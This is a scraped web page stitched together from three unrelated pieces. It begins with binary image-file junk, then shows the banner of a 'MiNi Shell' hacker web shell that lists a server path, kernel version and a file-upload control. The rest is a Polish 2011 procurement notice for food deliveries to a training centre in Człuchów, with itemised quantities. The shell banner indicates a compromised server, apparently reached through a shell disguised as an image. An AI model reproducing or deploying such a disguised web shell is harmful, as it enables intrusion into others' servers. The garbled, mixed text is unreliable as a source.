JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111108/291539-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2012 r.</b><br>
<b>Numer ogłoszenia: 291539 - 2011; data zamieszczenia: 08.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskaohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie od 1 stycznia 2012 r.  do dnia 31 grudnia 2012 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
      Przedmiot zamówienia podzielono na czternaście zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje   

2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14)	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
15)	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
16)	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 03.21.00.00-6, 15.41.00.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.32.41.00-1, 15.22.00.00-6, 15.86.00.00-0, 15.87.00.00-0, 03.14.25.00-3, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.10-9, 15.13.11.20-2, 15.13.11.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskaohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Wojewódzka Komenda Ochotniczych Hufców Pracy 
ul. Uphagena 27, 80-237 Gdańsk pokój 610..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro, pokój 605:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		arbuz	kg	149
2		banany	kg	150
3		brzoskwinie	kg	80
4		cytryny	kg	20
5		czereśnie	kg	10
6		gruszki	kg	30
7		jabłka	kg	200
8		kiwi	kg	9
9	owoce	kiwi	szt	80
10	świeże	nektaryny	kg	40
11		maliny 500g	szt	8
12		maliny	kg	8
13		mandarynki	kg	80
14		pomarancza	kg	28
15		pomarańcza siatka	kg	14
16		śliwki	kg	14
17		truskawki	kg	20
18		wisnie	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	48
brzoskwinie kons.0.9	szt	24
Dżem 7 kg	szt	10
Dżem  270 g	szt	120
kompot agrestowy 0,9l	szt	24
kompot wiśniowy 0,9 l	szt	24
owoce do ciasta 3 kg(puszka)	szt	2
sok owocowy 2l (różne smaki-pomarańcz	szt	30
grejfrut, jabłkowy, cz.pożeczka, mixitp)		
sok owocowy 1l (różne smaki-pomarań,	szt	40
gruszka, wiśnia, grejfrut,mix itp.)		
sok typu owocowy, warzywno -owocowe	szt	160
(marchew-trusk-banan, marchew-malina-		
banan, marchew-jabł-banan itp.)		
syrop owocowy 6,5l	szt	45
syrop owocowy 1l	szt	20
rodzynki suszone 100g	szt	20
rodzynki suszone 0.5 kg	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	25
burak	kg	300
brokuł	szt	5
cebula	kg	400
cebula młoda	kg	50
cebula czerwona 	kg	5
czosnek	szt	20
czosnek	kg	2
fasola jaś 0,5kg	szt	14
fasola drobna 5kg	szt	3
fasola drobna 0,5 kg	szt	12
fasola jaś	kg	25
fasola szparagowa	kg	10
groch cały	kg	10
groch łuska 0,5kg	szt	36
groch łuskany 5kg	szt	5
kabaczek	kg	25
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta 	kg	600
kapusta pekińska	kg	150
kapusta pekińska	szt	40
kapusta włoska	szt 	20
kalafior	szt	10
koper	szt	100
koper duży	szt	10
marchew młoda	kg	50
marchew myta	kg	400
ogórek gruntowy	kg	20
ogórek świeży	kg	80
papryka świeża	kg	8
pietruszka korzeń	kg	200
pomidor	kg	200
por 	szt	25
por 	kg	100
rzodkiewka pęczki	szt	80
sałata	szt	20
sałata dekoracyjna	szt	15
seler	kg	190
seler naciowa	szt	5
szczypiorek	szt	50
zielenina natka	szt	400
ziemniaki młode	kg	1200
ziemniaki 	kg	3850.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	36
cebulka konserwowa 300g	szt	5
fasolka czerwona konserw.	szt	10
groszek konserwowy 400g	szt	40
groszek z marchewką 0,9l	szt	16
kapusta kiszona  5kg	szt	36
koncentrat pomidorowy 0,9l	szt	40
koncentrat pomidorowy 1l	szt	10
kukurydza konserwowa	szt	36
kukurydza kons. 0,9 l	szt	18
oliwki 200ml	szt	3
ogórki kiszone 3kg	szt	20
ogórki małosolne	kg	16
ogórki konserwowe 0,9l	szt	56
papryka konserwowa 0,9l	szt	24
pieczarka	kg	15
pieczarka konserwowa 0,9l	szt	30
pieczarka solona 0.9	szt	24
pieczarka solona 3000ml	szt 	3
szczaw konserwowy 0,9l	szt	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	10
brukselka mroż. 2,5 kg	szt	10
brokuły mroż. 2,5 kg	szt	8
frytki  1kg	szt	18
frytki 450g	szt	20
Frytki 1,5 kg	szt	7
Frytki 2 kg	szt	8
groszek mrozony	kg	15
groszek mrozony 2,5 kg	szt	2
hamburger mrozony 	szt	80
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	25
marchew mini 2,5 kg	szt	2
marchew kostka 2,5 kg	szt	2
marchew kostka mroż	kg	50
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	25
mieszanka kompotowa 	kg	15
pizza 500g	szt	80
pyzy z mięsem  	kg	80
pyzy z owocami (knedle)	kg	20
szpinak 1kg	szt	20
truskawki mrozone	kg	10
warzywa na patelnię	kg	10
warzywa na pat.chinskie	kg	5
zapiekanka 200g	szt	120
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja klasy M o gramaturze 53-63 gr	szt	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	25
boczek wędzony gotowany 	kg	10
boczek wędzony surowy	kg	10
baleron wieprzowy	kg	50
ćwiartki tylne drobiowe	kg	30
filet drobiowy	kg	15
filet z piersi kurczaka	kg	85
filet królewski z indyka lu równoważny	kg	30
golonka wieprz b/k	kg	12
olonka wiep z kością	kg	12
Kabanosy typu leśne lub równoważne	kg	20
karkówka wieprz b/k 	kg	90
karkówka wieprz z/k	kg	16
kiełbasa biała parzona	kg	12
kiełbasa biała  surowa	kg	12
kiełbasa codzienna lub równowazna	kg	45
kiełbasa śląska lub równowazna	kg	30
kiełbasa toruńska lub równowazna	kg	50
kiełbasa typu ogniskowa lub równoważna	kg	64
kiełbasa szynkowa	kg	150
korpusy drobiowe(grzbiety)	kg	200
kości wieprzowe	kg	150
kotlet do hamburgera	kg	4
kotlet do hamburgera 250g	szt	80
krakowska	kg	50
łopatka b/k	kg	150
łopatka z kością	kg	15
metka cebulowa 200g	szt	80
metka łososiowa 	kg	17
metka inna typu wiejska lub równowazna	kg	5
mielonka konserwowa	kg	22
mielonka śniadaniowa lub równowazna	kg	34
mięso gulaszowe	kg	20
mortadela	kg	10
ogonówka 	kg	60
parówka hot-dog drobiowa	kg	5
parówka w folii	kg	100
parówka wiedenska lub równowazna	kg	12
pasztetowa  domowa lub równowazna	kg	20
pasztetowa  śmietankowa lub równowazna	kg	12
pasztet drobiowy	kg	16
polędwica drobiowa	kg	20
polędwica miodowa lub równowazna	kg	25
polędwica sopocka drobiowalub równowazna	kg	24
polędwica szkolna	kg	20
polędwica wieprzowa (Mięso)	kg	5
polędwica wieprz.(wędlina)	kg	4
polędwica z warzywami	kg	12
przysmak w konserwie lub równowazny	kg	25
przysmak śniadaniowy 130g	szt	40
salami rodzinne lub równowazne	kg	9
serca drobiowe	kg	10
serdelki	kg	60
schab wiep b/k	kg	40
schab wiep z/k	kg	11
słonina	kg	6
smaczek konserwowy lub równowazny	kg	53
smaczek konserwowy 0,5kg lub równowazna	szt	12
szynka mielona	kg	12
szynka konserwowa 	kg	20
szynka wiep b/k	kg	30
szynka typu królewiecka mielo lub równowazna	kg	12
szynka typu szynka żołnierska lub równowazna	kg	30
tyrolska lub równowazna	kg	35
tyrolska puszka 300g lub równowazna	szt	40
turystyczna lub równowazna	szt	40
udka	kg	480
wątroba drobiowa	kg	28
wątroba wieprzowa	kg	21
wołowina zrazowa	kg	7
żeberka wiep	kg	28
żołądki drobiowe	kg	14
żywiecka 	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	35
karp	kg	10
matijas	kg	18
mintaj wędzony	kg	6
paluszki rybne	kg	12
panga	kg	35
paprykarz 156g	szt	40
szprot w pomidorach	szt	40
śledź w pomidorach	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony pszenny 0,6 kg	szt	5000
ciastka drożdżowe 100g	szt	120
ciasta różne	kg	8
bułki pszenne100g	szt	360
bułki 50g	szt	440
bułki hamburger	szt	120
rogal 100g	szt	120
bułka tarta	kg	20
pączki 100g	szt	120
ciastka francuskie100g	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
